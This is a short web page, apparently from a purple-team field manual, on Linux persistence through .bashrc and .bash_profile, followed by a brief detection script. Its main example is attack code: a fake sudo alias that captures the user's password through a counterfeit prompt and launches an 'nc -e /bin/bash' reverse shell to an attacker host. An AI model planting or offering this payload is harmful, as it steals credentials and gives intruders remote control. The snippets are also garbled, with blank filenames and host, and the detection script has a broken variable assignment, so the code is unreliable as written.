Skip to content
Picture of PTFM

PTFM

Persistence through .bashrc and .bash_profile

While changing your .bashrc and .bash_profile can be great to customize your bash experience, they can also be used as a persistence mechanism for an adversary. The following directories can be used for this persistence mechanism.

/etc/profile
/etc/bash.bashrc
~/.bashrc
~/.bash_profile
~/.profile

You can take the below example malicious code and add it to any of the above files above to have a bash shell callout to <ip> and <port>

Example Code:

<var>="<.hidden filename> "
 cat << EOF > /tmp/
   alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale  = "en" ]; then echo -n "[sudo] password for \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd" | /usr/bin/sudo -S nohup nc   -e /bin/bash > /dev/null && /usr/bin/sudo -S '
 EOF
 if [ -f ~/.bashrc ]; then
     cat /tmp/ >> ~/.bashrc
 fi
 if [ -f ~/.zshrc ]; then
     cat /tmp/ >> ~/.zshrc
 fi
 rm /tmp/<var>

This can easily be detected by looking in these file locations for any additions or by using the following code to detect changes.

Example Detection Code:

#!/bin/bash
MIN=30
 MOD=find ./ \( -cmin -$MIN -or -mmin -$MIN -or -amin -$MIN \) -name '~/.bashrc'
 if [ -n "$MOD" ]; then
     notify-send -u critical -t 0 -i /usr/share/icons/gnome/32x32/status/dialog-warning.png ".bashrc config file has been modified"
 fi
#detect.sh
add cron job to check every 30 min
30 * * * * /bin/bash /<path>/detect.sh


Share this post